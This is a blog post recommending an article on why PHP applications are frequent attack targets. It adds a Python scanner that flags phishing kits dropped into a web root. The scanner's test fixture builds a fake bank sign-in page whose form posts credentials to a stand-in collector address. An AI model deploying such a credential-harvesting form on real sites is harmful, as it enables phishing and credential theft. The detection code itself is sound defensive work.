Excellent post on Security Focus by Kelly Martin called PHP apps: Security’s Low-hanging Fruit, a worthwhile read for anyone running applications written in PHP, WordPress for example. The article covers the rise in popularity of PHP, the resulting surge in PHP-based applications, and the problems brought about by less-experienced coders contributing to Open Source projects. Apparently PHP applications accounted for about 43% of all security incidents in 2006, which is a pretty staggering statistic.
Here’s one of the scenarios he painted:
There are all sorts of automated scripts out there that search for vulnerable PHP applications, exploit them when found, and then automatically download a set of phishing HTML files and images that make John’s Awesome Blog suddenly look like the Bank of America’s login page. This also happens with ASP and Perl applications too, as well as those written in other languages, but today PHP is far more popular a target. That website owner, John, might be held responsible too if there weren’t dozens of these incidents each day.
Pretty scary, huh? Well, it’s worth paying heed to the article, so check it out!
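The scenario above ends with a phishing kit dropped into a compromised web root, and that is the part a site owner can actually look for. As an added example that is not from this post or from Kelly Martin's article, here is a small Python scan that walks a PHP web root and flags files carrying the traces such a drop leaves: a credential form that posts to an off-site URL, bank branding next to a password field, and HTML living in a hidden directory. The web root it scans is constructed inline in a temporary directory; the indicator patterns, the hidden-directory heuristic and the 198.51.100.23 collector address are assumptions made for the demo.

```python
"""Scan a PHP web root for files that look like a dropped phishing kit.

Added example, not code from the post or the SecurityFocus article. The
indicators below are heuristics chosen for the demo, not a vendor signature
set: a clean site can trip one of them and a kit can dodge all of them.
"""
from __future__ import annotations

import os
import re
import tempfile

# Form whose action attribute we can read.
FORM_RE = re.compile(r'<form[^>]*action\s*=\s*["\']([^"\']+)["\']', re.I)
# Any password input on the page.
PASSWORD_RE = re.compile(r'type\s*=\s*["\']password["\']', re.I)
# Bank-style branding; assumed wording for the demo.
BRAND_RE = re.compile(
    r'\b(bank of america|online banking|sign[- ]?in to your account)\b', re.I)
# Hidden directory anywhere in the relative path (".tmp/", ".cache/"...).
HIDDEN_DIR_RE = re.compile(r'(^|/)\.[^/]+/')


def inspect_file(path: str) -> list[str]:
    """Return the indicator descriptions one file triggers (empty if clean)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read(200_000)  # kits are small; cap the read anyway
    except OSError:
        return []
    reasons = []
    has_password = PASSWORD_RE.search(text) is not None
    for action in FORM_RE.findall(text):
        # A login form on your own site normally posts to a relative URL;
        # posting credentials to an absolute off-site URL is the kit's tell.
        if has_password and re.match(r'https?://', action, re.I):
            reasons.append(f"credential form posts off-site to {action}")
    if has_password and BRAND_RE.search(text):
        reasons.append("bank branding next to a password field")
    return reasons


def scan_webroot(root: str, exts=(".html", ".htm", ".php")) -> dict[str, list[str]]:
    """Walk the web root and map each suspicious file (relative path) to its reasons."""
    hits: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = inspect_file(full)
            # A hidden directory is only interesting once the page itself
            # looks like a kit; on its own it would flag too much.
            if reasons and HIDDEN_DIR_RE.search(rel):
                reasons.append("lives in a hidden directory")
            if reasons:
                hits[rel] = reasons
    return hits


def build_sample_webroot() -> str:
    """Construct a throwaway web root: a normal WordPress-style login page plus
    a kit dropped into a hidden directory. Sample data, constructed here."""
    root = tempfile.mkdtemp(prefix="webroot-")
    files = {
        "wp-login.php": (
            '<form name="loginform" action="/wp-login.php" method="post">'
            '<input type="text" name="log"><input type="password" name="pwd">'
            '</form>'
        ),
        "index.php": "<?php require 'wp-blog-header.php'; ?>",
        ".tmp/signin/index.html": (
            "<title>Bank of America | Online Banking | Sign In</title>"
            '<form action="http://198.51.100.23/collect.php" method="post">'
            '<input name="user"><input type="password" name="pass"></form>'
        ),
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, reasons in scan_webroot(build_sample_webroot()).items():
        print(rel)
        for reason in reasons:
            print("  -", reason)
```

Point `scan_webroot` at a real document root instead of the sample and diff its output against the last run; on a WordPress install nothing under `wp-admin/`, `wp-includes/` or `wp-content/uploads/` should ever carry a password form that posts elsewhere.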